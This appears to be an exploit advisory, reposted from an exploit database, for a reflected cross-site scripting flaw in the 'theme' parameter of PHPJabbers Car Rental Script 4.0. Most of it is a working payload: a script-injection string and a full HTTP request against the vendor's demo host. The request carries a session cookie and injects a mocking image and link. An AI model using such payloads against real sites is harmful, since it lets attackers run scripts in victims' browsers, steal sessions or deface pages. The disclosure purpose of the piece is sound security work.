Share
## https://sploitus.com/exploit?id=PACKETSTORM:220734
## Titles: Car-Rental-Script4.0-XSS-Reflected Cross-site scripting
    (reflected)
    ## Author: nu11secur1ty
    ## Date: 05/08/2026
    ## Vendor: https://www.phpjabbers.com/
    ## Software: https://www.phpjabbers.com/car-rental-script/
    ## Reference: https://portswigger.net/web-security/cross-site-scripting
    
    ## Description:
    The value of the theme request parameter is copied into the value of an
    HTML tag attribute which is encapsulated in double quotation marks. The
    payload sjw0c"><script>alert(1)</script>bfadm was submitted in the theme
    parameter. This input was echoed unmodified in the application's response.
    This proof-of-concept attack demonstrates that it is possible to inject
    arbitrary JavaScript into the application's response.
    
    STATUS: HIGH- Vulnerability
    
    [+]Exploit:
    
    ```GET
    GET
    /scripts/car-rental-script/preview.php?locale=1&hide=0&theme=theme1sjw0c%22%3E%3Ca%20href=%22
    https://www.youtube.com/watch?v=Q9pX-pEAFT4%22%20target=%22_blank%22%3E%20%3Cimg%20src=%22https://media1.tenor.com/m/sLjUbG5BVikAAAAd/trump-dance-trump-2024.gif%22%20alt=%22STUPID%22width=%22900%22%20height=%22450%22%3E%20%3C/a%3Ebfadm
    HTTP/2
    Host: demo.phpjabbers.com
    Cookie: CarRental=0cd0c3272fee2e4f0fb2053e6afb3dbc
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not-A.Brand";v="24", "Chromium";v="146"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    ```
    
    
    ## Demo PoC:
    [href](https://www.patreon.com/posts/car-rental-0-xss-157738744)
    
    ## Time spent:
    00:27:00